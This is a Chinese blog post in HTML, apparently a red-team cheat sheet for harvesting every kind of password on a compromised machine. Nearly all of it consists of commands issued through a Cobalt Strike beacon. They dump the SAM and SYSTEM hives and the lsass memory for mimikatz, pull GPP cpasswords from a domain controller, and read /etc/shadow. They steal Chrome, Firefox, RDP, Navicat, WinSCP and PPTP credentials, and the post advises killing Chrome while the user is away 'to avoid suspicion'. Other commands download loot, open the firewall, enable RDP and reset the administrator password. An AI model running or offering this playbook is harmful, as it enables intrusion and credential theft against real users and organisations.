<!DOCTYPE html>
<html lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">



<title>获取当前机器上的各类密码 | langke Blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    



    
    
        
    


</head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">langke&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                

            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">langke&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div id="post-toc" class="post-toc">
            <span class="post-toc-title">catalogue</span>
            <div class="post-toc-content">
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#获取当前机器上的各类密码数据"><span class="toc-text">获取当前机器上的各类密码数据</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#各类配置文件中的密码"><span class="toc-text">各类配置文件中的密码</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#常用批量搜索命令："><span class="toc-text">常用批量搜索命令：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#回收站中的密码"><span class="toc-text">回收站中的密码</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#数据库中保存的账号密码"><span class="toc-text">数据库中保存的账号密码</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#mysql"><span class="toc-text">mysql</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MsSql"><span class="toc-text">MsSql</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#系统登录密码（说明：“beacon-gt-”为cs-beacon命令行，“-gt-”为本地命令行-）"><span class="toc-text">系统登录密码（说明：“beacon&gt;”为cs-beacon命令行，“#&gt;”为本地命令行 ）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows-免杀抓hash"><span class="toc-text">Windows 免杀抓hash</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows-免杀抓明文"><span class="toc-text">Windows 免杀抓明文</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#搜集GPP和NETLOGON脚本中的域账号密码"><span class="toc-text">搜集GPP和NETLOGON脚本中的域账号密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux系统用户密码hash"><span class="toc-text">Linux系统用户密码hash</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#无线密码"><span class="toc-text">无线密码</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#系统上各种应用记录的密码"><span class="toc-text">系统上各种应用记录的密码</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#浏览器"><span class="toc-text">浏览器</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WEB凭据中的各类明文密码"><span class="toc-text">WEB凭据中的各类明文密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows-普通凭据中的明文密码"><span class="toc-text">Windows 普通凭据中的明文密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mimikatz套件抓Windows凭据明文"><span class="toc-text">mimikatz套件抓Windows凭据明文</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mimikatz抓取当前系统中的所有账号密码"><span class="toc-text">mimikatz抓取当前系统中的所有账号密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RDP连接密码"><span class="toc-text">RDP连接密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#离线解密Navicat中保存的各类数据库连接密码"><span class="toc-text">离线解密Navicat中保存的各类数据库连接密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#解密-WinSCP中保存的密码"><span class="toc-text">解密 WinSCP中保存的密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#解密保存在当前机器中的-PPTP-连接密码"><span class="toc-text">解密保存在当前机器中的 PPTP 连接密码</span></a></li></ol></li></ol></li></ol>
            </div>
        </div>
    
    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">获取当前机器上的各类密码</h1>
            
                <div class="post-meta">
                    

                    
                        <span class="post-time">
                        Date: <a href="#">07 19&nbsp;&nbsp;18:58:47</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <section class="post-content">
            <h1 id="获取当前机器上的各类密码数据"><a href="#获取当前机器上的各类密码数据" class="headerlink" title="获取当前机器上的各类密码数据"></a>获取当前机器上的各类密码数据</h1><h2 id="各类配置文件中的密码"><a href="#各类配置文件中的密码" class="headerlink" title="各类配置文件中的密码"></a>各类配置文件中的密码</h2><p>web.conf , web.conf.bak , connection.php , db_mysql.inc, dbconfig.php , dbconfig.php.new , db_connect.php , connect.php , db_conn.php , config.inc.php , wp-config.php , configuration.php</p>
<h3 id="常用批量搜索命令："><a href="#常用批量搜索命令：" class="headerlink" title="常用批量搜索命令："></a>常用批量搜索命令：</h3><ul>
<li><p>Linux</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find ./ -type f -regex &apos;.*\.txt\|.*\.xml\|.*\.php\|.*\.jsp\|.*\.conf\|.*\.bak\|.*\.js\|.*\.inc\|.*\.htpasswd\|.*\.inf\|.*\.ini\|.*\.log&apos; | xargs egrep &quot;user|uname|pass|pwd|admin|login&quot;</span><br></pre></td></tr></table></figure>
</li>
<li><p>Windows</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">（需要IIS7+）%systemroot%/system32/inetsrv/appcmd.exe list site</span><br><span class="line">（需要IIS7+）%systemroot%\system32\inetsrv\appcmd.exe list vdir</span><br><span class="line"></span><br><span class="line">beacon&gt; shell findstr /c:&quot;user=&quot; /c:&quot;pass=&quot; /c:&quot;login=&quot; /c:&quot;uid=&quot; /c:&quot;pwd=&quot; /si *.ini *.inf *.txt *.cgi *.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.log *.bak</span><br><span class="line">beacon&gt; shell findstr /c:&quot;DB_USER&quot; /c:&quot;DB_PASSWORD&quot; /c:&quot;*cred*&quot; /si *.php</span><br><span class="line"></span><br><span class="line">beacon&gt; mimikatz privilege::debug</span><br><span class="line">beacon&gt; mimikatz iis:apphost /in:&quot;%systemroot%&quot;\system32\inetsrv\config\applicationHost.config</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="回收站中的密码"><a href="#回收站中的密码" class="headerlink" title="回收站中的密码"></a>回收站中的密码</h3><p>直接翻回收站</p>
<h2 id="数据库中保存的账号密码"><a href="#数据库中保存的账号密码" class="headerlink" title="数据库中保存的账号密码"></a>数据库中保存的账号密码</h2><h3 id="mysql"><a href="#mysql" class="headerlink" title="mysql"></a>mysql</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">// 搜索含有关键字的列名及位置,返回 db, tables, columns三列</span><br><span class="line">select table_schema as db,table_name as tables,column_name as columns from information_schema.columns where column_name like &apos;%user%&apos; or column_name like &apos;%pass%&apos; or column_name like &apos;%login%&apos; ;</span><br><span class="line"></span><br><span class="line">// 根据上条语句返回的结果，查询数据</span><br><span class="line">select 列名1，列名2，··· from 库名.表名;</span><br><span class="line">select user,password,host from mysql.user;</span><br><span class="line"></span><br><span class="line">// 数据库中保存的其他数据库用户密码hash</span><br><span class="line">select Host,User,Password,authentication_string from mysql.user;</span><br></pre></td></tr></table></figure>
<h3 id="MsSql"><a href="#MsSql" class="headerlink" title="MsSql"></a>MsSql</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">// 选择一个数据库</span><br><span class="line">USE dangan;</span><br><span class="line"></span><br><span class="line">// 搜索全库的 user，pass，login，email等列</span><br><span class="line">SELECT TABLE_CATALOG, TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME like &apos;%user%&apos; OR COLUMN_NAME like &apos;%pass%&apos; or COLUMN_NAME like &apos;%login%&apos; or COLUMN_NAME like &apos;%email%&apos;;</span><br><span class="line"></span><br><span class="line">// 数据库中保存的其他数据库的密码hash</span><br><span class="line">SELECT name,password_hash FROM master.sys.sql_logins;</span><br></pre></td></tr></table></figure>
<h2 id="系统登录密码（说明：“beacon-gt-”为cs-beacon命令行，“-gt-”为本地命令行-）"><a href="#系统登录密码（说明：“beacon-gt-”为cs-beacon命令行，“-gt-”为本地命令行-）" class="headerlink" title="系统登录密码（说明：“beacon&gt;”为cs-beacon命令行，“#&gt;”为本地命令行 ）"></a>系统登录密码（说明：“beacon&gt;”为cs-beacon命令行，“#&gt;”为本地命令行 ）</h2><h3 id="Windows-免杀抓hash"><a href="#Windows-免杀抓hash" class="headerlink" title="Windows 免杀抓hash"></a>Windows 免杀抓hash</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; shell reg save HKLM\SAM sam.hiv</span><br><span class="line">beacon&gt; shell reg save HKLM\SYSTEM sys.hiv</span><br><span class="line">beacon&gt; shell reg save HKLM\security security.hiv</span><br><span class="line">// 下载回本地</span><br><span class="line">beacon&gt; download sys.hiv</span><br><span class="line">beacon&gt; download sam.hiv</span><br><span class="line">beacon&gt; download security.hiv</span><br><span class="line">// 本地用secretsdump.py脚本解密</span><br><span class="line">#&gt; python secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL</span><br></pre></td></tr></table></figure>
<h3 id="Windows-免杀抓明文"><a href="#Windows-免杀抓明文" class="headerlink" title="Windows 免杀抓明文"></a>Windows 免杀抓明文</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">// 查看目标系统当前的登录记录</span><br><span class="line">beacon&gt; shell query user</span><br><span class="line">//  查看目标系统详细信息,2012r2之后的系统则需要先启用wdigest，否则无法直接抓取。</span><br><span class="line">beacon&gt; shell wmic OS get Caption,CSDVersion,OSArchitecture,Version</span><br><span class="line">// 上传 procdump64.exe</span><br><span class="line">beacon&gt; upload procdump64.exe</span><br><span class="line">// dump进程lsass.exe在内存中的数据</span><br><span class="line">beacon&gt; shell procdump64.exe -accepteula -ma lsass.exe tmp.dmp</span><br><span class="line">beacon&gt; rm procdump64.exe</span><br><span class="line">beacon&gt; download tmp.dmp</span><br><span class="line">// 找个和目标机完全相同的环境，用mimikatz查看明文</span><br><span class="line">#&gt; mimikatz.exe &quot;log res.log&quot; &quot;sekurlsa::minidump tmp.dmp&quot; &quot;sekurlsa::logonPasswords full&quot; exit</span><br></pre></td></tr></table></figure>
<h3 id="搜集GPP和NETLOGON脚本中的域账号密码"><a href="#搜集GPP和NETLOGON脚本中的域账号密码" class="headerlink" title="搜集GPP和NETLOGON脚本中的域账号密码"></a>搜集GPP和NETLOGON脚本中的域账号密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">// 如果装了如下补丁，组策略的XML里就不可能再存有密码了，单机系统是不可能打的</span><br><span class="line">beacon&gt; shell wmic qfe get HotFixID | findstr KB2962486</span><br><span class="line">// 定位域控</span><br><span class="line">beacon&gt; shell net time /domain</span><br><span class="line">// 访问域控机器上的组策略共享目录和NETLOGON目录</span><br><span class="line">beacon&gt; shell net view OWA2010SP3</span><br><span class="line">beacon&gt; shell dir \\OWA2010SP3\SYSVOL</span><br><span class="line">// 将域控组策略共享目录中的文件全部拖回被控机器</span><br><span class="line">cd c:\windows\temp</span><br><span class="line">shell xcopy \\OWA2010SP3\SYSVOL\ . /y /e /i /q</span><br><span class="line">// 查看复制到被控机的文件</span><br><span class="line">shell dir c:\windows\temp\xxx</span><br><span class="line">cd xxx</span><br><span class="line">// 查看目录下的所有xml文件中的账号密码，</span><br><span class="line">shell findstr /c:&quot;userName=&quot; /c:&quot;cpassword=&quot; /si *.xml</span><br><span class="line">// 也可以尝试搜索其他密码，比如bat中的明文密码</span><br><span class="line">shell findstr /SI &quot;user pass&quot; *.bat</span><br><span class="line">// 把GPP.ps1最后一行的hash替换成获取的hash就行了，最后执行即可输出明文。</span><br><span class="line">powershell -f GPP.ps1</span><br></pre></td></tr></table></figure>
<h3 id="Linux系统用户密码hash"><a href="#Linux系统用户密码hash" class="headerlink" title="Linux系统用户密码hash"></a>Linux系统用户密码hash</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; shell grep &apos;\$&apos; /etc/shado</span><br></pre></td></tr></table></figure>
<h3 id="无线密码"><a href="#无线密码" class="headerlink" title="无线密码"></a>无线密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// 查看当前系统已保存的无线名称</span><br><span class="line">#&gt; netsh wlan show profiles </span><br><span class="line">// 查看指定无线的连接密码</span><br><span class="line">#&gt; netsh wlan show profile name=&quot;Tenda_48A460&quot; key=clear</span><br></pre></td></tr></table></figure>
<h2 id="系统上各种应用记录的密码"><a href="#系统上各种应用记录的密码" class="headerlink" title="系统上各种应用记录的密码"></a>系统上各种应用记录的密码</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// 查看系统上装了那些应用</span><br><span class="line">beacon&gt; powershell-import .\ListInstalledPrograms.ps1</span><br><span class="line">beacon&gt; powershell Get-list</span><br></pre></td></tr></table></figure>
<h3 id="浏览器"><a href="#浏览器" class="headerlink" title="浏览器"></a>浏览器</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">// chromg，读取密码之前需要先杀掉chrome进程，因为在chrome运作期间会锁定数据库导致无法解密</span><br><span class="line">beacon&gt; upload chrome_decrypt.exe </span><br><span class="line">beacon&gt; shell chrome_decrypt.exe</span><br><span class="line">// 查看进程，杀掉进程，最好是等到对方没开chrome时再读取，以免引起怀疑。</span><br><span class="line">beacon&gt; shell tasklist | findstr &quot;chrome.exe&quot;</span><br><span class="line">beacon&gt; shell taskkill /im chrome.exe /F</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// firefox </span><br><span class="line">暂时只有界面版的工具，passwordfox，如果不能rdp，就把Firefox的文件打包到本地，替换本地文件随便查看</span><br><span class="line">beacon&gt; upload 7z.exe</span><br><span class="line">beacon&gt; shell 7z.exe -r -padmin123 a firefox.7z %appdata%\Mozilla\</span><br><span class="line">beacon&gt; download firefox.7z</span><br></pre></td></tr></table></figure>
<h3 id="WEB凭据中的各类明文密码"><a href="#WEB凭据中的各类明文密码" class="headerlink" title="WEB凭据中的各类明文密码"></a>WEB凭据中的各类明文密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; powershell-import Get-VaultCredential.ps1</span><br><span class="line">beacon&gt; powershell Get-VaultCredential</span><br></pre></td></tr></table></figure>
<h3 id="Windows-普通凭据中的明文密码"><a href="#Windows-普通凭据中的明文密码" class="headerlink" title="Windows 普通凭据中的明文密码"></a>Windows 普通凭据中的明文密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// ps1文件路径为本地路径</span><br><span class="line">beacon&gt; powershell-import Invoke-WCMDump.ps1</span><br><span class="line">beacon&gt; powershell Invoke-WCMDump</span><br></pre></td></tr></table></figure>
<h3 id="mimikatz套件抓Windows凭据明文"><a href="#mimikatz套件抓Windows凭据明文" class="headerlink" title="mimikatz套件抓Windows凭据明文"></a>mimikatz套件抓Windows凭据明文</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; mimikatz vault::cred</span><br></pre></td></tr></table></figure>
<h3 id="mimikatz抓取当前系统中的所有账号密码"><a href="#mimikatz抓取当前系统中的所有账号密码" class="headerlink" title="mimikatz抓取当前系统中的所有账号密码"></a>mimikatz抓取当前系统中的所有账号密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; mimikatz !privilege::debug</span><br><span class="line">beacon&gt; mimikatz !sekurlsa::logonpasswords</span><br></pre></td></tr></table></figure>
<h3 id="RDP连接密码"><a href="#RDP连接密码" class="headerlink" title="RDP连接密码"></a>RDP连接密码</h3><ul>
<li><p>查看本地用户的RDP连接记录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; powershell-import /home/checker/Desktop/GetRdpHistoryAlluser.ps1</span><br><span class="line">beacon&gt; powershell GetRdpHistoryAlluser</span><br></pre></td></tr></table></figure>
</li>
<li><p>查看本地用户的RDP连接保存的凭据文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">// 一般保存在 用户对应的数据目录的Credentials文件夹里，如果有多条记录，响应会列出多个文件</span><br><span class="line">beacon&gt; shell dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*</span><br><span class="line">// 选择一个最新的文件查看，主要关注 “guidMasterKey”和“pbData”两个键的值</span><br><span class="line">beacon&gt; mimikatz privilege::debug</span><br><span class="line">beacon&gt; mimikatz dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\46B24362B242CD69B4699DB7886AC4CD</span><br><span class="line">// 根据上一步“guidMasterKey”的值来确定其对应的“MasterKey”</span><br><span class="line">beacon&gt; mimikatz sekurlsa::dpapi</span><br><span class="line">// 再用上面的“MasterKey”去解密“pgData”中的数据，最终拿到明文连接密码。地址=TargetName、账号=UserName、密码=CredentialBlob</span><br><span class="line">beacon&gt; mimikatz dpapi::cred /in:%userprofile%\AppData\Local\Microsoft\Credentials\46B24362B242CD69B4699DB7886AC4CD /masterkey:abcde***</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="离线解密Navicat中保存的各类数据库连接密码"><a href="#离线解密Navicat中保存的各类数据库连接密码" class="headerlink" title="离线解密Navicat中保存的各类数据库连接密码"></a>离线解密Navicat中保存的各类数据库连接密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">// 查看是否安装了Navicat</span><br><span class="line">beacon&gt; powershell-import ListInstalledprograms.ps1</span><br><span class="line">beacon&gt; powershell Get-list</span><br><span class="line">// 不同数据库密码hash保存的注册表位置不同</span><br><span class="line">MySQL             HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\</span><br><span class="line">MariaDB           HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\</span><br><span class="line">Microsoft SQL     HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\</span><br><span class="line">Oracle            HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\</span><br><span class="line">PostgreSQL        HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\</span><br><span class="line">SQLite            HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\</span><br><span class="line">// Navicat保存的MySQL的连接IP、连接用户名、连接密码hash查看</span><br><span class="line">beacon&gt; shell reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host 连接 ip</span><br><span class="line">beacon&gt; shell reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName 用于连接用户名</span><br><span class="line">beacon&gt; shell reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd 用于连接的密码 hash</span><br><span class="line">// 解密连接密码hash</span><br><span class="line">#&gt; python NavicatCryptoHelper.py -d &quot;0B86DFCABAA35629BCD4&quot;</span><br></pre></td></tr></table></figure>
<h3 id="解密-WinSCP中保存的密码"><a href="#解密-WinSCP中保存的密码" class="headerlink" title="解密 WinSCP中保存的密码"></a>解密 WinSCP中保存的密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">// 默认保存在注册表中</span><br><span class="line">reg query &quot;HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions&quot;</span><br><span class="line">// 上一步会返回保存的账号和主机，利用账号和主机查看密码hash</span><br><span class="line">shell reg query &quot;HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\test/root@192.168.3.177&quot;</span><br><span class="line">// 破解明文密码</span><br><span class="line">winscppwd.exe 账号 主机 密码hash</span><br><span class="line">// 有时候不在注册表中，目标通过设置放在了winscp.ini文件中,搜索时把`c:\`换成对应的盘符</span><br><span class="line">shell dir c:\ /s /b | findstr &quot;WinSCP.ini&quot;</span><br><span class="line">// 把找到的WinSCP.ini下载回本地，解密明文</span><br><span class="line">winscppwd.exe WinSCP.ini</span><br></pre></td></tr></table></figure>
<h3 id="解密保存在当前机器中的-PPTP-连接密码"><a href="#解密保存在当前机器中的-PPTP-连接密码" class="headerlink" title="解密保存在当前机器中的 PPTP 连接密码"></a>解密保存在当前机器中的 PPTP 连接密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">// PPTP连接密码一般保存在 rasphone.pbk 文件中，查找命令</span><br><span class="line">shell dir c:\ /s /b | findstr &quot;rasphone.pbk&quot;</span><br><span class="line">// 查看本机中保存的PPTP连接个数，出来几个，就是保存了几个。</span><br><span class="line">type &quot;c:\Users\langke\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk&quot; | findstr &quot;DEVICE&quot;</span><br><span class="line">// 查看rdp状态，1 表示关闭,0 表示开启。 开启 rdp。  关闭 rdp</span><br><span class="line">beacon&gt; shell REG QUERY &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections </span><br><span class="line">beacon&gt; shell REG ADD &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 00000000 /f </span><br><span class="line">beacon&gt; shell REG ADD &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 00000001 /f </span><br><span class="line">//  查看防火墙是否开启</span><br><span class="line">beacon&gt; shell netsh advfirewall show allprofiles</span><br><span class="line">// 手动放行rdp连接端口</span><br><span class="line">beacon&gt; shell netsh advfirewall firewall add rule name=&quot;remote desktop&quot; protocol=tcp dir=in localport=3389 action=allow</span><br><span class="line">// 开启administrator用户，并修改密码</span><br><span class="line">beacon&gt; shell net user administrator /active:yes</span><br><span class="line">beacon&gt; shell net user administrator admin</span><br><span class="line">// 用mimikatz开启目标机器多用户登录功能</span><br><span class="line">beacon&gt; mimikatz !privilege::debug</span><br><span class="line">beacon&gt; mimikatz !ts::multirdp</span><br><span class="line">// 用administrator登录目标机，上传事先弄好的免杀mimikatz，cmd下抓pptp密码</span><br><span class="line">#&gt; mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit</span><br><span class="line">// 尝试在目标机连接抓到的vpn</span><br><span class="line">rasdial &quot;vpn名字&quot; 账号 密码</span><br><span class="line">rasphone -h &quot;vpn名字&quot;</span><br></pre></td></tr></table></figure>
        </section>

        
            <section class="post-copyright">
                
                
                
                

            </section>
        

        <!--
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/win密码获取/"># win密码获取</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        -->
        <!--
        <section class="post-nav">
            
            
            <a class="next" rel="next" href="/2019/07/07/内网渗透常用工具和方法/">内网渗透常用工具和方法</a>
            
        </section>
        -->

    </article>
</div>

        </div>
        <!--
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© langke | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    	-->

    	<br>
    	<br>
    	<br>



    </div>
</body>
</html>
